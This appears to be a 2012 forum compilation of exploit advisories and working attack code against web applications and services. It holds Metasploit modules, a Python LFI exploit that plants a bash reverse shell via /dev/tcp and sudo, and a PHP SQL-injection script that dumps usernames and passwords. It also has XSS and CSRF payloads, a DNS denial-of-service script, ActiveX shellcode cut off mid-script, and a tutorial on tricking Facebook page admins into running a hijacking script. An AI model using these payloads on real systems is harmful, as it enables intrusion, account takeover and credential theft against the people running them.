The_Arhitect

Tftpd32 DNS Server 4.00 Denial Of Service Title: Tftpd32 DNS Server Denial Of Service Vulnerability Software : Tftpd32 Software Version : v4.00 Vendor: http://tftpd32.jounin.net/ Vulnerability Published : 2012-05-26 Vulnerability Update Time : Status : Impact : Medium(CVSS2 Base : 5.0, AV:N/AC:L/Au:N/C:N/I:N/A:P) Bug Description : Tftpd32 is a free tftp and dns server for windows, freeware tftp server. And the dns server would bind udp port 53, but it does not validate the domain option size leading to a Denial Of Service flaw while sending more than 127 characters to it. Solution : The tftpd32's dns server can drop the evil request when it was detected the domain option size were longer than 127 characters. Proof Of Concept : ----------------------------------------------------------- #!/usr/bin/perl use IO::Socket; use Socket; use Math::BigInt; $|=1; $host=shift; $port=shift || '53'; die "usage: $0 \$host [\$port]\n" if(!defined($host)); $target_ip = inet_aton($host); $target = sockaddr_in($port, $target_ip); $crash='A'x128; $transaction_id_count=1; sub dns_struct_pack($){ $domain=shift; #domain $type="\x00\xff"; #dns_type = ANY $transaction_id_count=1 if($transaction_id_count > 255); $x=Math::BigInt->new($transaction_id_count); $x=~s/0x//; $transaction_id=sprintf("\x00".chr($x)); $flag="\x01\x00"; $question="\x00\x01"; $answer_rrs="\x00\x00"; $authority_rrs="\x00\x00"; $additional_rrs="\x00\x00"; if($domain ne '0'){ undef($domain_length); $domain_length=length($domain); $y=Math::BigInt->new($domain_length); $y=~s/0x//; $domain_length=chr($y); } $class="\x00\x01"; #IN $transaction_id_count++; if($domain eq '0'){ $packet_struct="$transaction_id"."$flag"."$question"."$answer_rrs"."$authority_rrs"."$additional_rrs"."\x00"."$type"."$class"; }else{ $packet_struct="$transaction_id"."$flag"."$question"."$answer_rrs"."$authority_rrs"."$additional_rrs"."$domain_length"."$domain". "\x00"."$type"."$class"; } return $packet_struct; } print "Launch attack ... "; socket(SOCK1, AF_INET, SOCK_DGRAM, 17); send(SOCK1, &dns_struct_pack($crash), 0, $target); close(SOCK1); print "Finish!\n"; exit(0); ----------------------------------------------------------- Credits : This vulnerability was discovered by demonalex(at)163(dot)com mail: demonalex(at)163(dot)com / ChaoYi.Huang@connect.polyu.hk Pentester/Researcher Dark2S Security Team/PolyU.HK Sursa: Tftpd32 DNS Server 4.00 Denial Of Service

PHP Volunteer Management System v 1.0.2 multiple SQLi Vuln. # Title: PHP Volunteer Management System v 1.0.2 multiple SQLi Vulnerabilities # Version: 1.0.2 # Author/Found by: loneferret # Software Site: https://sourceforge.net/projects/phpvolunteer/ # Other vulnerabilities: http://www.exploit-db.com/exploits/18941/ # Date found: May 28th 2012 # Tested on: Ubuntu Server 8.04 / PHP Version 5.2.4-2ubuntu5.23 # Vulnerability: # Due to improper sanitation, many of the parameters are injectable, # some need to be authenticated, others not. # As always have fun... PoC: Page: index.php Parameter: ?p= Method: GET Payload: /?p=dashboard' and sleep(5) and '1'='1 Payload: /?p=login' and sleep(5) and '1'='1 Other affected parameters can be found in the message section of the application when reading or deleting a message. Parameter: id= Url: /?p=read_message&id=2 Payload: /?p=read_message&id=-1' or '1'='1 Possible output: [10:00:02] [INFO] searching database 'bf102' [10:00:02] [INFO] the SQL query used returns 1 entries [10:00:02] [INFO] resumed: "bf102" found databases [1]: [*] bf102 Sursa: PHP Volunteer Management System v 1.0.2 multiple SQLi Vuln.

PHP Volunteer Management System v 1.0.2 Multiple Vulnerabilities # Exploit Title: PHP Volunteer Management System v 1.0.2 Multiple Vulnerabilities # Date: 05/28/12 # Author: Ashoo # Mail: ashoo.online@gmail.com # Software Site: https://sourceforge.net/projects/phpvolunteer/ # Version: 1.0.2 # Tested on: IIS6.0-Windows 2003 ##### ToC ##### 1.0 Introduction 2.0 Unrestricted File Upload 3.0 Persistent XSS ##### 1.0 Introduction ##### This is a PHP Volunteer Management software. Keep track of Volunteer hours worked and location assignments. This system is built on PHP/MySql. ##### 2.0 Unrestricted File Upload ##### Bug: Upload document (personal or Shared) functionallity of application allow unrestricted file upload. This can be abused by the attacker to upload backdoor to webserver. PoC: http://192.168.6.12/?p=upload_shared_document - Shared document upload http://192.168.6.12/?p=upload_personal_document - personal document upload Upload php backdoor (r57, c99, etc) to the server.backdoor shell will be uploaded to mods/documents/uploads/ directory of shell.Will provide complete control over webserver. ##### 3.0 Persistent XSS ##### Bug: The persistent cross site scripting vulnerability exists in "add news information section" A remote attacker with privileges can exploit this vulnerablity. PoC: http://localhost/?p=add_news_information In "Information to Display" text box Insert the following test strings <script> alert("xss me"); </script> fill other entries and submit! switch to the dashboard or login page, it is getting executed ######### #Ash00!!# ######### Sursa: PHP Volunteer Management System v 1.0.2 Multiple Vulnerabilities

Symantec Web Gateway 5.0.2.8 Command Execution Vulnerability ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient def initialize(info={}) super(update_info(info, 'Name' => "Symantec Web Gateway 5.0.2.8 Command Execution Vulnerability", 'Description' => %q{ This module exploits a vulnerability found in Symantec Web Gateway's HTTP service. By injecting PHP code in the access log, it is possible to load it with a directory traversal flaw, which allows remote code execution under the context of 'apache'. Please note that it may take up to several minutes to retrieve access_log, which is about the amount of time required to see a shell back. }, 'License' => MSF_LICENSE, 'Author' => [ 'Unknown', #Discovery 'muts', #PoC 'sinn3r' #Metasploit ], 'References' => [ ['CVE', '2012-0297'], ['EDB', '18932'], ['URL', 'http://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=2012&suid=20120517_00'] ], 'Payload' => { 'BadChars' => "\x00" }, 'DefaultOptions' => { 'WfsDelay' => 300, #5 minutes 'DisablePayloadHandler' => 'false', 'ExitFunction' => "none" }, 'Platform' => ['php'], 'Arch' => ARCH_PHP, 'Targets' => [ ['Symantec Web Gateway 5.0.2.8', {}], ], 'Privileged' => false, 'DisclosureDate' => "May 17 2012", 'DefaultTarget' => 0)) end def check res = send_request_raw({ 'method' => 'GET', 'uri' => '/spywall/login.php' }) if res and res.body =~ /\<title\>Symantec Web Gateway\<\/title\>/ return Exploit::CheckCode::Detected else return Exploit::CheckCode::Safe end end def exploit peer = "#{rhost}:#{rport}" php = %Q|<?php #{payload.encoded} ?>| # Inject PHP to log print_status("#{peer} - Injecting PHP to log...") res = send_request_raw({ 'method' => 'GET', 'uri' => "/#{php}" }) select(nil, nil, nil, 1) # Use the directory traversal to load the PHP code # access_log takes a long time to retrieve print_status("#{peer} - Loading PHP code..") send_request_raw({ 'method' => 'GET', 'uri' => '/spywall/releasenotes.php?relfile=../../../../../usr/local/apache2/logs/access_log' }) print_status("#{peer} - Waiting for a session, may take some time...") select(nil, nil, nil, 1) handler end end Sursa: Symantec Web Gateway 5.0.2.8 Command Execution Vulnerability

How to Hack Facebook Fan Page FIRST DO ME A FAVOUR TAKES 5 SECONDS ! if you like this tutorial than say great thanks or what ever u want nicely Now lets start the tutorial. First of all we will need to setup an exploit and a website to host the exploit. If you already have a hosting then its great otherwise there are couple of free hosting websites that can be used for such purposes. I will tell you about it along with the tutorial. 1. Download the exploit from this Download HackPages At facebook rar, fast and secure downloading from crocko.com 2. After downloading it, you need to edit the it. Get notepad++, one of my hot favorite editor. You can download it from Notepad++ v5.9.8 3. Open the file named pagehack.js with notepad++. Now find the text wamiqali@hungry-hackers.com by pressing ctrl+f and replace it with your own email id which you have used while signing up for facebook. 4. Now you have to change the viral text which will be sent to the friends of the victims. To do this, find the text Hey See what i got! and replace it with your own text. This text will be sent to the facebook wall of 15 friends of the slave. Since it is an autoposting bot, to prevent facebook from blocking it, I reduced its capacity to 15. Now just save it as anything.js (Tip: Be social engineer and rename it to something more attractive like getprizes.js or booster.js) 5. Now you have to upload this script to your server. For this make an account at 0fess.net or 000webhost.com (t35 or 110mb won’t help this time) and use filezilla and upload this to your root. So the address where your script is uploaded will be as follows: http://www.yoursite.0fess.net/booster.js 6. Now comes the most important part of this Hack. You need to convince the admin of that Fan page to put the following code (Note: Don’t forget to replace the text in bold with the address of your script) in his browser’s address bar and hit enter while he is on Facebook. Code:

Hacker Highschool Ebook Collection http://www.mediafire.com/?ddb7cdry7y7xb7n Sursa: Hacker Highschool - Lessons

SocialEngine 4.2.2 Multiple Vulnerabilities Social Engine 4.2.2 Multiples Vulnerabilities Earlier versions are also possibly vulnerable. INFORMATION Product: Social Engine 4.2.2 Remote-Exploit: yes Vendor-URL: http://www.socialengine.net/ Discovered by: Tiago Natel de Moura aka "i4k" Discovered at: 10/04/2012 CVE Notified: 10/04/2012 CVE Number: CVE-2012-2216 OVERVIEW Social Engine versions 4.2.2 is vulnerable to XSS and CSRF. INTRODUCTION SocialEngine is a PHP-based white-label social networking service platform, that provides features similar to a social network on a user's website. Main features include administration of small-to-mid scale social networks, some customization abilities, unencrypted code, multilingual capability, and modular plugin/widget compatibility. There is a range of templates and add-ons available to extend the basic features already included in the SocialEngine core. VULNERABILITY DESCRIPTION == Persistent XSS in music upload. == CWE-79: http://cwe.mitre.org/data/definitions/79.html The software does not neutralize or incorrectly neutralizes user-controllable input before it is placed in output that is used as a web page that is served to other users. Proof Of Concept: POST http://localhost/index.php/music/create POST data without form-data enctype: title=<script>alert(document.cookie);</script>&description=teste &search=1&auth_view=everyone&MAX_FILE_SIZE=8388608&filename= &fancyuploadfileids=15 == Persistent XSS in creating events == POST http://localhost/socialengine/socialengine422_trial/index.php/events/create POST data without form-data enctype: title=teste XSS 3&description=teste XSS 3&starttime[date]=4/9/2012& starttime[hour]=1&starttime[minute]=0&starttime[ampm]=AM&endtime[date]=4/12/2012 &endtime[hour]=1&endtime[minute]=0&endtime[ampm]=AM&host=teste &location=<script>alert(document.cookie);</script>&MAX_FILE_SIZE=8388608& photo=&category_id=0&search=&search=1&approval=&auth_invite=&auth_invite=1& auth_view=everyone&auth_comment=everyone&auth_photo=everyone&submit= == Reflected XSS in search form of events area. == Direct javascript injected: POST http://localhost/index.php/widget/index/content_id/644 format=html&subject=event_1&search=';alert(document.cookie);var a = ' Proof of Concept: - - Go to URL: /index.php/event/$EVENT_ID - - Click on the "Guests" - - Click in "Search guests" form - - Submit: ';alert(document.cookie); var a = ' You will see your PHPSESSID in the alert. == Multiples CSRF vulnerabilities == CWE-352: http://cwe.mitre.org/data/definitions/352.html The web application does not, or can not, sufficiently verify whether a well-formed, valid, consistent request was intentionally provided by the user who submitted the request. A CSRF in the plugin "Forum" allows forcing the owner of the event to do some activities such as: Close a topic: GET /index.php/forums/topic/4/example-topic/close/close/1 Open a topic: GET /index.php/forums/topic/4/example-topic/close/close/0 A CSRF in the plugin "Event" allows forcing the owner of the event to do some activities such as: Close the event: GET /index.php/events/topic/close/close/1/event_id/2/topic_id/2 Open the event: GET /index.php/events/topic/close/close/0/event_id/2/topic_id/2 "Watch Topic": GET /index.php/events/topic/watch/watch/1/event_id/2/topic_id/2 "Stop Watching Topic": GET /index.php/events/topic/watch/watch/0/event_id/2/topic_id/2 A CSRF in the plugin "Classifieds" allows forcing the owner of the event to do some activities such as: Open the classified listing: GET /index.php/classifieds/close/1/closed/0 Close the classified listing: GET /index.php/classifieds/close/1/closed/1 VERSIONS AFFECTED Tested with version 4.2.2 but earlier versions are possibly vulnerable. SOLUTION Upgrade to Social Engine 4.2.4. NOTES The Common Vulnerabilities and Exposures (CVE) project has assigned the name CVE-2012-2216 to this issue. This is a candidate for inclusion in the CVE list (http://cve.mitre.org), which standardizes names for security problems. CREDITS Tiago Natel de Moura aka "i4k" SEC+ Information Security Company - http://www.secplus.com.br/ BugSec Security Team - http://bugsec.googlecode.com/ -- Tiago Natel de Moura IT Security Consultant http://www.linkedin.com/in/tiagonatel http://www.secplus.com.br/ http://github.com/tiago4orion http://code.google.com/p/bugsec Sursa: SocialEngine 4.2.2 Multiple Vulnerabilities

appRain CMF Arbitrary PHP File Upload Vulnerability ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient def initialize(info={}) super(update_info(info, 'Name' => "appRain CMF Arbitrary PHP File Upload Vulnerability", 'Description' => %q{ This module exploits a vulnerability found in appRain's Content Management Framework (CMF), version 0.1.5 or less. By abusing the uploadify.php file, a malicious user can upload a file to the uploads/ directory without any authentication, which results in arbitrary code execution. }, 'License' => MSF_LICENSE, 'Author' => [ 'EgiX', #Discovery, PoC 'sinn3r' #Metasploit ], 'References' => [ ['CVE', '2012-1153'], ['OSVDB', '78473'], ['EDB', '18392'] ], 'Payload' => { 'BadChars' => "\x00" }, 'DefaultOptions' => { 'ExitFunction' => "none" }, 'Platform' => ['php'], 'Arch' => ARCH_PHP, 'Targets' => [ ['appRain 0.1.5 or less', {}] ], 'Privileged' => false, 'DisclosureDate' => "Jan 19 2012", 'DefaultTarget' => 0)) register_options( [ OptString.new('TARGETURI', [true, 'The base path to appRain', '/appRain-q-0.1.5']) ], self.class) end def check uri = target_uri.path uri << '/' if uri[-1,1] != '/' res = send_request_cgi({ 'method' => 'GET', 'uri' => "#{uri}addons/uploadify/uploadify.php" }) if res and res.code == 200 and res.body.empty? return Exploit::CheckCode::Detected else return Exploit::CheckCode::Safe end end def exploit uri = target_uri.path uri << '/' if uri[-1,1] != '/' peer = "#{rhost}:#{rport}" payload_name = Rex::Text.rand_text_alpha(rand(10) + 5) + '.php' post_data = "--o0oOo0o\r\n" post_data << "Content-Disposition: form-data; name=\"Filedata\"; filename=\"#{payload_name}\"\r\n\r\n" post_data << "<?php " post_data << payload.encoded post_data << " ?>\r\n" post_data << "--o0oOo0o\r\n" print_status("#{peer} - Sending PHP payload (#{payload_name})") res = send_request_cgi({ 'method' => 'POST', 'uri' => "#{uri}addons/uploadify/uploadify.php", 'ctype' => 'multipart/form-data; boundary=o0oOo0o', 'data' => post_data }) # If the server returns 200 and the body contains our payload name, # we assume we uploaded the malicious file successfully if not res or res.code != 200 or res.body !~ /#{payload_name}/ print_error("#{peer} - I don't think the file was uploaded. Abort!") return end print_status("#{peer} - Executing PHP payload (#{payload_name})") # Execute our payload res = send_request_cgi({ 'method' => 'GET', 'uri' => "#{uri}addons/uploadify/uploads/#{payload_name}" }) # If we don't get a 200 when we request our malicious payload, we suspect # we don't have a shell, either. Print the status code for debugging purposes. if res and res.code != 200 print_status("#{peer} - Server returns #{res.code.to_s}") end end end Sursa: appRain CMF Arbitrary PHP File Upload Vulnerability

Symantec Web Gateway 5.0.2 Remote LFI Root Exploit #!/usr/bin/python # Symantec Web Gateway 5.0.2 Remote LFI root Exploit Proof of Concept # Exploit requires no authentication, /tmp/networkScript is sudoable and apache writable. # muts at offensive-security dot com import socket import base64 payload= '''echo '#!/bin/bash' > /tmp/networkScript; echo 'bash -i >& /dev/tcp/172.16.164.1/1234 0>&1' >> /tmp/networkScript;chmod 755 /tmp/networkScript; sudo /tmp/networkScript''' payloadencoded=base64.encodestring(payload).replace("\n","") taint="GET /<?php shell_exec(base64_decode('%s'));?> HTTP/1.1\r\n\r\n" % payloadencoded expl = socket.socket ( socket.AF_INET, socket.SOCK_STREAM ) expl.connect(("172.16.164.129", 80)) expl.send(taint) expl.close() trigger="GET /spywall/releasenotes.php?relfile=../../../../../usr/local/apache2/logs/access_log HTTP/1.0\r\n\r\n" expl = socket.socket ( socket.AF_INET, socket.SOCK_STREAM ) expl.connect(("172.16.164.129", 80)) expl.send(trigger) expl.close() Sursa: Symantec Web Gateway 5.0.2 Remote LFI Root Exploit

RabidHamster R4 Log Entry sprintf() Buffer Overflow ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpClient def initialize(info={}) super(update_info(info, 'Name' => "RabidHamster R4 Log Entry sprintf() Buffer Overflow", 'Description' => %q{ This module exploits a vulnerability found in RabidHamster R4's web server. By supplying a malformed HTTP request, it is possible to trigger a stack-based buffer overflow when generating a log, which may result in arbitrary code execution under the context of the user. }, 'License' => MSF_LICENSE, 'Author' => [ 'Luigi Auriemma', #Discovery, PoC 'sinn3r' #Metasploit ], 'References' => [ ['OSVDB', '79007'], ['URL', 'http://aluigi.altervista.org/adv/r4_1-adv.txt'], ['URL', 'http://secunia.com/advisories/47901/'] ], 'Payload' => { 'StackAdjustment' => -3500, 'BadChars' => "\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x20" }, 'DefaultOptions' => { 'ExitFunction' => "process" }, 'Platform' => 'win', 'Targets' => [ ['R4 v1.25', {'Ret'=>0x73790533}] #JMP ESI (ddraw.dll) ], 'Privileged' => false, 'DisclosureDate' => "Feb 09 2012", 'DefaultTarget' => 0)) register_options( [ OptPort.new('RPORT', [true, 'The remote port', 8888]) ], self.class) end def check res = send_request_cgi({ 'method' => 'GET', 'uri' => '/' }) if res and res.headers['Server'] == 'R4 Embedded Server' return Exploit::CheckCode::Detected else return Exploit::CheckCoded::Safe end end def exploit buf = '' buf << payload.encoded buf << rand_text_alpha(2022-buf.length, payload_badchars) buf << [target.ret].pack("V*") buf << pattern_create(200) buf << rand_text_alpha(3000-buf.length, payload_badchars) send_request_cgi({ 'method' => 'GET', 'uri' => "/?#{buf}" }) end end Sursa: RabidHamster R4 Log Entry sprintf() Buffer Overflow

Vanilla FirstLastNames 1.3.2 Plugin Persistant XSS # Title: Vanilla FirstLastNames 1.3.2 Plugin Persistant XSS Vulnerability # Date: 18/5/12 # Author: Henry Hoggard # Author URL: henryhoggard.co.uk # Author Twitter: @henryhoggard # Software: Vanilla Version 2.0.18.4 + FirstLastNames 1.3.2 http://vanillaforums.org/addon/firstlastnames-plugin # http://vanillaforums.org ############################################################# On Edit your account enter your XSS String in either the first name or last name field. Then if a user visits your page the XSS will execute. http://target.tld/index.php?p=/profile/myprofile/1/user XSS: <script>alert('x')</script> ############################################################# http://henryhoggard.co.uk Sursa: Vanilla FirstLastNames 1.3.2 Plugin Persistant XSS

Vanilla Forums About Me Plugin Persistant XSS # Title: Vanilla About Me Plugin Persistant XSS Vulnerability # Date: 18/5/12 # Author: Henry Hoggard # Author URL: henryhoggard.co.uk # Author Twitter: @henryhoggard # Software: Vanilla Version 2.0.18.4 + About Me 1.1.1 # http://vanillaforums.org/addon/aboutme-plugin # http://http://vanillaforums.org ############################################################# Go to http://target.tld/index.php?p=/profile/editme/4/testmember Post your XSS In any of the text fields, for this we used the Real Name Field and the following XSS XSS: <script>alert('x')</script> Then if a user visits your about me page (http://target.tld/index.php?p=/profile/aboutme/4/testmember) the script will execute ############################################################# http://henryhoggard.co.uk Sursa: Vanilla Forums About Me Plugin Persistant XSS

Supernews <= 2.6.1 SQL Injection Exploit <?php # Exploit Title: Supernews <= 2.6.1 SQL Injection Exploit # Google Dork: intext:"2003 - 2004 : SuperNews : Todos os direitos reservados" # Date: 2012/ # Author: WhiteCollarGroup # Software Link: http://phpbrasil.com/script/vT0FaOCySSH/supernews # Version: 2.6.1 # Tested on: Debian GNU/Linux /* Exploit for educational purpose only. Note sent to the developer Fernando Pontes by e-mail odnanrefsetnop@bol.com.br SuperNews are a brazilian news system in PHP and MySQL. Versions priors to 2.6 have a simple SQL Injection on view news. The developer tried to fix the bug removing keywords like "union" and "select". But, with a recursion, it's possible to bypass this filters. See: seselectlect After removing "select" word, will stay another "select" word. See more: seSELECTlect Another SQL Injection on the administration panel: When deleting a post, you can inject SQL for delete all news on the database. Another vulnerability allows to delete files, on the administration panel: When deleting a post, a variable called "unlink" will talk to the system the new's image for delete. But it's possible to delete others files, typing all the file path or using "../". Usage: php exploit.php http://target.com/supernews/ For more info about vulnerabilities: php exploit.php moreinfo Example: $ php exploit.php http://target.com/news/ Supernews <= 2.6.1 SQL Injection Exploit Coded by WhiteCollarGroup - www.wcgroup.host56.com Use at your own risk. [*] Trying to access server... [*] Detecting version... [!] Version: >2.6.1 [!] Administration panel: http://target.com/news/admin/adm_noticias.php [i] Type "exploit.php moreinfo" for get others vulnerabilities. [*] Getting user & pass 8-] User: user1 Pass: pass1 User: user2 Pass: pass2 Good luck! */ error_reporting(E_ERROR); set_time_limit(0); @ini_set("default_socket_timeout", 30); function hex($string){ $hex=''; // PHP 'Dim' =] for ($i=0; $i < strlen($string); $i++){ $hex .= dechex(ord($string[$i])); } return '0x'.$hex; } function str_replace_every_other($needle, $replace, $haystack, $count=null, $replace_first=true) { $count = 0; $offset = strpos($haystack, $needle); //If we don't replace the first, go ahead and skip it if (!$replace_first) { $offset += strlen($needle); $offset = strpos($haystack, $needle, $offset); } while ($offset !== false) { $haystack = substr_replace($haystack, $replace, $offset, strlen($needle)); $count++; $offset += strlen($replace); $offset = strpos($haystack, $needle, $offset); if ($offset !== false) { $offset += strlen($needle); $offset = strpos($haystack, $needle, $offset); } } return $haystack; } function removeaddregex($str) { return str_replace_every_other('(.*)', '', $str, null, false); } function preg_quote_working($str) { $chars = explode(" ", "\ . + * ? [ ^ ] $ ( ) { } = ! < > | :"); foreach($chars as $char) { $str = str_replace($char, "\\".$char, $str); } return $str; } echo "\nSupernews <= 2.6.1 SQL Injection Exploit"; echo "\nCoded by WhiteCollarGroup - www.wcgroup.host56.com\nUse at your own risk.\n\n"; if($argc!=2) { echo "Usage: php $argv[0] url Example: php $argv[0] http://target.com/supernews php $argv[0] https://target.com/supernews/"; exit; } if($argv[1]=="moreinfo") { echo "\nMore vulnerabilities: - Deleting files You can delete files on the server, after login, using the URL: http://server.com/admin/adm_noticias.php?deleta=ID&unlink=FILE Replace \"ID\" with a valid post ID (will be deleted) and FILE with the file address on the server. - Deleting all news on the database: You can delete all news on the database with one request, only. Look: http://server.com/admin/adm_noticias.php?deleta=0%20or%201=1--+ All vulnerabilities discovered by WCGroup.\n"; exit; } $uri = $argv[1]; if(substr($uri, -1, 1)!="/") { $uri .= "/"; } $url = $uri."noticias.php?noticia=".urlencode("-1")."+"; echo "\n[*] Trying to access server..."; $accessvr = @file_get_contents($url); if(($accessvr==false) OR (preg_match("/(404|mysql_query)/", $accessvr))) { $url = $uri."index.php?noticia=".urlencode("-1")."+"; } $token = substr(md5(chr(rand(48, 122))), 0, 10); echo "\n[*] Detecting version... :-o"; $gettoken = strip_tags(file_get_contents($url.urlencode("union all select 1,2,3,4,".hex($token).",6,7-- "))); if(preg_match("/".$token."/", $gettoken)) { echo "\n[!] Version: >2.6.1 :-)"; $version = 1; } else { $gettoken = strip_tags(file_get_contents($url.urlencode("uniunionon seleselectct 1,2,3,4,5,".hex($token).",7,8-- "))); if(preg_match("/".$token."/", $gettoken)) { echo "\n[!] Version =2.6.1 :-)"; $version = 2; } else { echo "\n[-] Unknown version :-S"; $version = 3; } } if($version!=3) { echo "\n[!] Administration panel: {$uri}admin/adm_noticias.php"; echo "\n[i] Type \"$argv[0] moreinfo\" for get others vulnerabilities."; echo "\n[*] Getting user & pass 8-]"; } if($version==1) { $i = 0; while(true) { $request = strip_tags(file_get_contents($url.urlencode("union all select 1,2,3,4,concat(".hex($token).",user,".hex($token).",pass,".hex($token)."),6,7 from supernews_login limit $i,1-- "))); preg_match_all("/$token(.*)$token(.*)$token/", $request, $get); if($get[1][0]!="") { $user = $get[1][0]; $pass = $get[2][0]; echo "\nUser: $user\nPass: $pass\n"; $i++; } else { echo "\nGood luck! :-D"; break; } } } elseif($version==2) { $i = 0; while(true) { $request = strip_tags(file_get_contents($url.urlencode("uniunionon seleselectct 1,2,3,4,5,concat(".hex($token).",user,".hex($token).",pass,".hex($token)."),7,8 from supernews_login limit $i,1-- "))); preg_match_all("/$token(.*)$token(.*)$token/", $request, $get); if($get[1][0]!="") { $user = $get[1][0]; $pass = $get[2][0]; echo "\nUser: $user\nPass: $pass\n"; $i++; } else { echo "\nGood luck! :-D"; break; } } } else { echo "\n\nThis site are using an unknown version of Supernews or another CMS."; echo "\nPlease note that only versions <= 2.6.1 of Supernews are vulnerable."; echo "\nWebservers with modules or firewalls like \"mod_security\" aren't vulnerables."; echo "\nIf you want, try to access manually:"; echo "\nThe vulnerability are on view notice file (index.php or noticia.php), in variable \"noticia\", a simple SQL Injection."; echo "\nWe're sorry."; } echo "\n"; Sursa: Supernews <= 2.6.1 SQL Injection Exploit

Artiphp CMS 5.5.0 Database Backup Disclosure Exploit <?php /* Artiphp CMS 5.5.0 Database Backup Disclosure Exploit Vendor: Artiphp Product web page: http://www.artiphp.com Affected version: 5.5.0 Neo (r422) Summary: Artiphp is a content management system (CMS) open and free to create and manage your website. Desc: Artiphp stores database backups using backupDB() utility with a predictable file name inside the web root, which can be exploited to disclose sensitive information by downloading the file. The backup is located in '/artzone/artpublic/database/' directory as 'db_backup_[type].[yyyy-mm-dd].sql.gz' filename. Tested on: Microsoft Windows XP Professional SP3 (EN) Apache 2.2.21 PHP 5.3.8 / 5.3.9 MySQL 5.5.20 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2012-5091 Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2012-5091.php 15.05.2012 */ error_reporting(0); print "\no==========================================================o\n"; print "| |"; print "\n|\tArtiphp CMS 5.5.0 DB Backup Disclosure Exploit |\n"; print "| |\n"; print "|\t\t\tby LiquidWorm |\n"; print "| |"; print "\no==========================================================o\n"; if ($argc < 3) { print "\n\n\x20[*] Usage: php $argv[0] <host> <port>\n\n\n"; die(); } $godina_array = array('2012','2011','2010'); $mesec_array = array('12','11','10','09', '08','07','06','05', '04','03','02','01'); $dn_array = array('31','30','29','28','27','26', '25','24','23','22','21','20', '19','18','17','16','15','14', '13','12','11','10','09','08', '07','06','05','04','03','02', '01'); $backup_array = array('full','structure','partial'); $host = $argv[1]; $port = intval($argv[2]); $path = "/artiphp/artzone/artpublic/database/"; // change per need. $alert1 = "\033[0;31m"; $alert2 = "\033[0;37m"; foreach($godina_array as $godina) { print "\n\n\x20[*] Checking year: ".$godina."\n\n Scanning: "; sleep(2); foreach($mesec_array as $mesec) { foreach($dn_array as $dn) { print "~"; foreach($backup_array as $backup) { if(file_get_contents("http://".$host.":".$port.$path."db_backup_".$backup.".".$godina."-".$mesec."-".$dn.".sql.gz")) { print "\n\n\x20[!] DB backup file discovered!\n\n"; echo $alert1; print "\x20==>\x20"; echo $alert2; die("http://".$host.":".$port.$path."db_backup_".$backup.".".$godina."-".$mesec."-".$dn.".sql.gz\n"); } } } } } print "\n\n\x20[*] Zero findings.\n\n\n" ?> Sursa: Artiphp CMS 5.5.0 Database Backup Disclosure Exploit

SkinCrafter ActiveX Control version 3.0 Buffer Overflow # Software : SkinCrafter from NMSoft Technologies # Version : SkinCrafter version 3.0 # Title : Buffer overflow in skincrafter3_vs2005.dll of skinCrafter vs3.0 # Link : http://www.skincrafter.com/downloads/SkinCrafter_Demo_2005_2008_x86.zip # Date : May 17, 2012 # Tested on : XP SP2 # The vulnerability lies in the COM component used by the product SkinCrafter # from DMSoft Technologies(http://www.dmsofttech.com/projects.html). This COM # component, SkinCrafter3_vs2005.dll, implememnts a function InitLicenKeys, # whose parameter is not checked for the bounds, hence leading to the # overflow condition ==== POC: ==== <html> Exploit !!!!!!!!!!!!!!!!!!!!!!!!! <object classid='clsid:B9D38E99-5F6E-4C51-8CFD-507804387AE9' id='target' ></object> <script language='vbscript'> 'Exploit title: Buffer overflow in skincrafter3_vs2005.dll of skinCrafter vs3.0 'Date: May 17, 2012 'author: Saurabh Sharma(HCL Technologies) sharma_saurabh@hcl.com 'Software Link: http://www.skincrafter.com/downloads/SkinCrafter_Demo_2005_2008_x86.zip 'version: SkinCrafter version 3.0 'Tested on : XP SP2 'CVE-2012-2271 targetFile = "C:\Program Files\SkinCrafter3\SkinCrafterDemo\SkinCrafterActiveX\SkinCrafter3_vs2005.dll" prototype = "Sub InitLicenKeys ( ByVal reg_name As String , ByVal company As String , ByVal email As String , ByVal licenkey As String )" memberName = "InitLicenKeys" progid = "SKINCRAFTERLib.SCSkin3" argCount = 4 shellcode= unescape("%eb%03%59%eb%05%e8%f8%ff%ff%ff%49%49%49%49%48%49") & _ unescape("%49%49%49%49%49%49%49%49%49%49%49%49%51%5a%6a%68") & _ unescape("%58%50%30%42%31%42%41%6b%41%41%78%32%41%42%32%42") & _ unescape("%41%30%42%41%41%58%38%41%42%50%75%59%79%39%6c%4a") & _ unescape("%48%50%44%63%30%35%50%43%30%4c%4b%57%35%77%4c%4c") & _ unescape("%4b%51%6c%35%55%64%38%77%71%6a%4f%4c%4b%62%6f%45") & _ unescape("%48%4e%6b%31%4f%45%70%55%51%6a%4b%73%79%6e%6b%70") & _ unescape("%34%6c%4b%46%61%7a%4e%70%31%4b%70%4e%79%6e%4c%6c") & _ unescape("%44%49%50%52%54%67%77%5a%61%59%5a%34%4d%55%51%6f") & _ unescape("%32%4a%4b%79%64%37%4b%51%44%41%34%35%54%71%65%6d") & _ unescape("%35%4e%6b%53%6f%47%54%65%51%4a%4b%31%76%4e%6b%46") & _ unescape("%6c%30%4b%6e%6b%51%4f%75%4c%54%41%58%6b%4c%4b%77") & _ unescape("%6c%6e%6b%66%61%58%6b%6d%59%33%6c%46%44%46%64%6a") & _ unescape("%63%35%61%6b%70%71%74%6e%6b%63%70%54%70%6f%75%6f") & _ unescape("%30%54%38%56%6c%4c%4b%61%50%36%6c%4e%6b%34%30%35") & _ unescape("%4c%4c%6d%6e%6b%43%58%75%58%58%6b%54%49%4c%4b%4d") & _ 